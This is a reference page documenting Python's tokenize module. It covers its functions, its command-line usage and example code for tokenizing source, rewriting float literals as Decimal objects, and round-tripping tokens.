tokenize — Tokenizer for Python source
======================================

Source code: Lib/tokenize.py
(https://github.com/python/cpython/tree/3.10/Lib/tokenize.py)

The tokenize module provides a lexical scanner for Python source code, implemented in Python.
The scanner in this module returns comments as tokens as well, making it useful for implementing "pretty-printers", including colorizers for on-screen displays.

To simplify token stream handling, all operator and delimiter tokens and Ellipsis are returned using the generic OP token type. The exact type can be determined by checking the exact_type property on the named tuple returned from tokenize.tokenize().

Tokenizing Input
----------------

The primary entry point is a generator:

tokenize.tokenize(readline)
    The tokenize() generator requires one argument, readline, which must be a callable object that provides the same interface as the io.IOBase.readline() method of file objects. Each call to the function should return one line of input as bytes.

    The generator produces 5-tuples with these members: the token type; the token string; a 2-tuple (srow, scol) of ints specifying the row and column where the token begins in the source; a 2-tuple (erow, ecol) of ints specifying the row and column where the token ends in the source; and the line on which the token was found. The line passed (the last tuple item) is the physical line.
    The 5-tuple is returned as a named tuple with the field names type, string, start, end, and line.

    The returned named tuple has an additional property named exact_type that contains the exact operator type for OP tokens. For all other token types, exact_type equals the named tuple's type field.

    Changed in version 3.1: Added support for named tuples.

    Changed in version 3.3: Added support for exact_type.

    tokenize() determines the source encoding of the file by looking for a UTF-8 BOM or encoding cookie, according to PEP 263.
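As a quick illustration of exact_type (a minimal sketch added for this edit, not part of the upstream page), the snippet below tokenizes a one-line expression and prints the generic and exact names of every OP token:

    import io
    import token
    import tokenize

    source = b"x = (1 + 2) * 3\n"
    for tok in tokenize.tokenize(io.BytesIO(source).readline):
        if tok.type == token.OP:
            # tok.type is the generic OP for every operator and delimiter;
            # tok.exact_type distinguishes EQUAL, LPAR, PLUS, RPAR, STAR, ...
            print(tok.string, token.tok_name[tok.type], token.tok_name[tok.exact_type])

For instance, the '=' token prints as "= OP EQUAL": the generic and exact types differ only for OP tokens.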
tokenize.generate_tokens(readline)
    Tokenize a source reading unicode strings instead of bytes.

    Like tokenize(), the readline argument is a callable returning a single line of input. However, generate_tokens() expects readline to return a str object rather than bytes.

    The result is an iterator yielding named tuples, exactly like tokenize(). It does not yield an ENCODING token.

All constants from the token module are also exported from tokenize.

Another function is provided to reverse the tokenization process. This is useful for creating tools that tokenize a script, modify the token stream, and write back the modified script.

tokenize.untokenize(iterable)
    Converts tokens back into Python source code. The iterable must return sequences with at least two elements: the token type and the token string. Any additional sequence elements are ignored.

    The reconstructed script is returned as a single string. The result is guaranteed to tokenize back to match the input, so the conversion is lossless and round-trips are assured. The guarantee applies only to the token type and token string; the spacing between tokens (column positions) may change.

    It returns bytes, encoded using the ENCODING token, which is the first token sequence output by tokenize(). If there is no encoding token in the input, it returns a str instead.
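A minimal round-trip sketch (an addition to the page, using only the API described above): tokenize a small source string, feed the full token stream back through untokenize(), and verify that token types and strings survive:

    import io
    import tokenize

    source = b"def add(a, b):\n    return a + b\n"
    tokens = list(tokenize.tokenize(io.BytesIO(source).readline))

    # The stream starts with the ENCODING token emitted by tokenize(),
    # so untokenize() returns bytes encoded accordingly.
    rebuilt = tokenize.untokenize(tokens)

    again = list(tokenize.tokenize(io.BytesIO(rebuilt).readline))
    assert ([(t.type, t.string) for t in tokens]
            == [(t.type, t.string) for t in again])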
tokenize() needs to detect the encoding of source files it tokenizes. The function it uses to do this is available:

tokenize.detect_encoding(readline)
    The detect_encoding() function is used to detect the encoding that should be used to decode a Python source file. It requires one argument, readline, in the same way as the tokenize() generator.

    It will call readline a maximum of twice, and return the encoding used (as a string) and a list of any lines (not decoded from bytes) it has read in.

    It detects the encoding from the presence of a UTF-8 BOM or an encoding cookie as specified in PEP 263. If both a BOM and a cookie are present but disagree, a SyntaxError will be raised. Note that if the BOM is found, 'utf-8-sig' will be returned as the encoding.

    If no encoding is specified, then the default of 'utf-8' will be returned.

    Use tokenize.open() to open Python source files: it uses detect_encoding() to detect the file encoding.

tokenize.open(filename)
    Open a file in read-only mode using the encoding detected by detect_encoding().

    New in version 3.2.
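To make the two return values concrete, here is a short sketch (an addition, assuming a hello.py like the one used in the Examples section below) that probes a file's encoding without tokenizing it fully:

    import tokenize

    # detect_encoding() consumes at most two lines while looking for a
    # UTF-8 BOM or a PEP 263 encoding cookie.
    with open('hello.py', 'rb') as f:
        encoding, consumed = tokenize.detect_encoding(f.readline)

    print(encoding)   # 'utf-8' unless the file declares otherwise
    print(consumed)   # the raw bytes lines read during detection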
exception tokenize.TokenError
    Raised when either a docstring or expression that may be split over several lines is not completed anywhere in the file, for example:

        """Beginning of
        docstring

    or:

        [1,
         2,
         3

Note that unclosed single-quoted strings do not cause an error to be raised. They are tokenized as ERRORTOKEN, followed by the tokenization of their contents.
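For illustration, a brief sketch (added here, not in the upstream page) showing TokenError raised for an unclosed bracket like the one above:

    import io
    import tokenize

    broken = b"[1,\n 2,\n 3\n"   # the list is never closed
    try:
        list(tokenize.tokenize(io.BytesIO(broken).readline))
    except tokenize.TokenError as exc:
        print("TokenError:", exc)   # e.g. ('EOF in multi-line statement', (4, 0))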
Command-Line Usage
------------------

New in version 3.3.

The tokenize module can be executed as a script from the command line. It is as simple as:

    python -m tokenize [-e] [filename.py]

The following options are accepted:

-h, --help
    show this help message and exit

-e, --exact
    display token names using the exact type

If filename.py is specified, its contents are tokenized to stdout. Otherwise, tokenization is performed on stdin.

Examples
--------

Example of a script rewriter that transforms float literals into Decimal objects:

    from tokenize import tokenize, untokenize, NUMBER, STRING, NAME, OP
    from io import BytesIO

    def decistmt(s):
        """Substitute Decimals for floats in a string of statements.

        >>> from decimal import Decimal
        >>> s = 'print(+21.3e-5*-.1234/81.7)'
        >>> decistmt(s)
        "print (+Decimal ('21.3e-5')*-Decimal ('.1234')/Decimal ('81.7'))"

        The format of the exponent is inherited from the platform C library.
        Known cases are "e-007" (Windows) and "e-07" (not Windows).  Since
        we're only showing 12 digits, and the 13th isn't close to 5, the
        rest of the output should be platform-independent.

        >>> exec(s)  #doctest: +ELLIPSIS
        -3.21716034272e-0...7

        Output from calculations with Decimal should be identical across all
        platforms.

        >>> exec(decistmt(s))
        -3.217160342717258261933904529E-7
        """
        result = []
        g = tokenize(BytesIO(s.encode('utf-8')).readline)  # tokenize the string
        for toknum, tokval, _, _, _ in g:
            if toknum == NUMBER and '.' in tokval:  # replace NUMBER tokens
                result.extend([
                    (NAME, 'Decimal'),
                    (OP, '('),
                    (STRING, repr(tokval)),
                    (OP, ')')
                ])
            else:
                result.append((toknum, tokval))
        return untokenize(result).decode('utf-8')

Example of tokenizing from the command line. The script:

    def say_hello():
        print("Hello, World!")

    say_hello()

will be tokenized to the following output, where the first column is the range of line/column coordinates where the token is found, the second column is the name of the token, and the final column is the value of the token (if any):

    $ python -m tokenize hello.py
    0,0-0,0:            ENCODING       'utf-8'
    1,0-1,3:            NAME           'def'
    1,4-1,13:           NAME           'say_hello'
    1,13-1,14:          OP             '('
    1,14-1,15:          OP             ')'
    1,15-1,16:          OP             ':'
    1,16-1,17:          NEWLINE        '\n'
    2,0-2,4:            INDENT         '    '
    2,4-2,9:            NAME           'print'
    2,9-2,10:           OP             '('
    2,10-2,25:          STRING         '"Hello, World!"'
    2,25-2,26:          OP             ')'
    2,26-2,27:          NEWLINE        '\n'
    3,0-3,1:            NL             '\n'
    4,0-4,0:            DEDENT         ''
    4,0-4,9:            NAME           'say_hello'
    4,9-4,10:           OP             '('
    4,10-4,11:          OP             ')'
    4,11-4,12:          NEWLINE        '\n'
    5,0-5,0:            ENDMARKER      ''

The exact token type names can be displayed using the -e option:

    $ python -m tokenize -e hello.py
    0,0-0,0:            ENCODING       'utf-8'
    1,0-1,3:            NAME           'def'
    1,4-1,13:           NAME           'say_hello'
    1,13-1,14:          LPAR           '('
    1,14-1,15:          RPAR           ')'
    1,15-1,16:          COLON          ':'
    1,16-1,17:          NEWLINE        '\n'
    2,0-2,4:            INDENT         '    '
    2,4-2,9:            NAME           'print'
    2,9-2,10:           LPAR           '('
    2,10-2,25:          STRING         '"Hello, World!"'
    2,25-2,26:          RPAR           ')'
    2,26-2,27:          NEWLINE        '\n'
    3,0-3,1:            NL             '\n'
    4,0-4,0:            DEDENT         ''
    4,0-4,9:            NAME           'say_hello'
    4,9-4,10:           LPAR           '('
    4,10-4,11:          RPAR           ')'
    4,11-4,12:          NEWLINE        '\n'
    5,0-5,0:            ENDMARKER      ''

Example of tokenizing a file programmatically, reading unicode strings instead of bytes with generate_tokens():

    import tokenize

    with tokenize.open('hello.py') as f:
        tokens = tokenize.generate_tokens(f.readline)
        for token in tokens:
            print(token)

Or reading bytes directly with tokenize():

    import tokenize

    with open('hello.py', 'rb') as f:
        tokens = tokenize.tokenize(f.readline)
        for token in tokens:
            print(token)